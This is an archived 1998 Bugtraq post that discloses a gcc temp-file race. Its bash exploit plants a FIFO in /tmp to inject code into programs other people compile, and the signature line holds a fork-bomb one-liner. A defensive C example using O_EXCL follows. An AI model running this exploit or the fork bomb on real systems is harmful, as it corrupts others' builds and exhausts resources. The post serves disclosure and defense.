Bugtraq mailing list archives
Pipe attack - an example
From: lcamtuf () BOSS STASZIC WAW PL (Michał Zalewski)
Date: Fri, 20 Feb 1998 18:46:47 +0100
Due to the questions about the possibility of performing 'pipe attacks'
- here is a *working* example of a program which appends the function
printf("This program has been infected!\n"); after the declarations
in the main() function to sources compiled using gcc. That IS a serious
problem, isn't it? Of course, of course, this one (gcc vulnerability)
can be easily patched, but gcc isn't the only vulnerable program!
Ok, here it is:
--
#!/bin/bash
# Advanced gcc viral implant
# by Michal Zalewski (lcamtuf () staszic waw pl)
# ** EXECUTION PROHIBITED **
CC1=`find /usr/lib/gcc-lib -name cc1`
VICT=0
renice +20 $PPID >&/dev/null
cd /tmp
echo "I'm free, I'm free! Oh, I'm free..."
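while :; do
  # Look for the preprocessed temp file (cc*.i) of a compile in progress
  V=`ls cc*.i 2>/dev/null|cut -f 1 -d "."`
  if [ ! "$V" = "" ]; then
    # Pre-create the matching assembler output name as a world-writable FIFO
    mkfifo -m 666 ${V}.s &>/dev/null
    if [ -p ${V}.s ]; then
      sleep 1
      # Copy the preprocessed source, inserting the printf() into main()
      cat ${V}.i|awk 'match($2,"main")==1{x=1};y!=1&&x==1&&match($1,"(">0){y=1;print "printf(\"This program has been infected!\\n\");"};{print $0}'>.lv$$.i
      $CC1 .lv$$.i
      # Drain what the real cc1 wrote to the FIFO, then feed in the modified assembly
      cat ${V}.s>/dev/null
      cat .lv$$.s >${V}.s
      let VICT=VICT+1
      echo "Someone has been just trapped ($VICT)."
    fi
    rm -f .lv$$.* ${V}.s &>/dev/null
  fi
done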
--
_______________________________________________________________________
Michał Zalewski [tel 9690] | finger 4 PGP [lcamtuf () boss staszic waw pl]
To iterate is human, to execute recursively - divine [P. Deutsch]
=--------------- [ echo "\$0&\$0">_;chmod +x _;./_ ] -----------------=
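
The script above depends on a FIFO created in advance at the predictable cc*.s name in /tmp being opened as if it were the compiler's own output file. The following C code is an added defensive example, not part of the original post and not gcc's code: it creates an intermediate file with O_CREAT|O_EXCL and verifies the object it got. The function names and the file names under /tmp are hypothetical.

```c
#define _POSIX_C_SOURCE 200809L
#include <errno.h>
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/* Hypothetical helper: create an intermediate file nobody else can have planted.
 * O_EXCL makes open() fail with EEXIST if the name already exists as anything
 * (regular file, symlink, FIFO), and it never blocks on a FIFO. */
int create_private_output(const char *path)
{
    struct stat st;
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
    if (fd < 0)
        return -1;
    /* Second check: what we hold must be a regular file owned by us. */
    if (fstat(fd, &st) != 0 || !S_ISREG(st.st_mode) || st.st_uid != geteuid()) {
        close(fd);
        errno = EPERM;
        return -1;
    }
    return fd;
}

/* Constructed scenario: a FIFO already sits at the name about to be used for
 * assembler output. Returns 1 if it is refused and a fresh name is accepted. */
int demo(void)
{
    char dir[] = "/tmp/pipe-demo-XXXXXX";   /* private scratch directory */
    char planted[64], fresh[64];
    int ok = 0;
    if (!mkdtemp(dir))
        return 0;
    snprintf(planted, sizeof planted, "%s/cc001234.s", dir);
    snprintf(fresh, sizeof fresh, "%s/cc005678.s", dir);
    if (mkfifo(planted, 0666) == 0) {
        int refused = create_private_output(planted) < 0 && errno == EEXIST;
        int fd = create_private_output(fresh);
        ok = refused && fd >= 0;
        if (fd >= 0)
            close(fd);
    }
    unlink(planted); unlink(fresh); rmdir(dir);
    return ok;
}

int main(void) { return demo() ? 0 : 1; }
```

Refusing an existing name stops the substitution, but a predictable name can still be occupied to make the build fail, so unpredictable names (mkstemp) or a per-user temporary directory are the usual complement.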
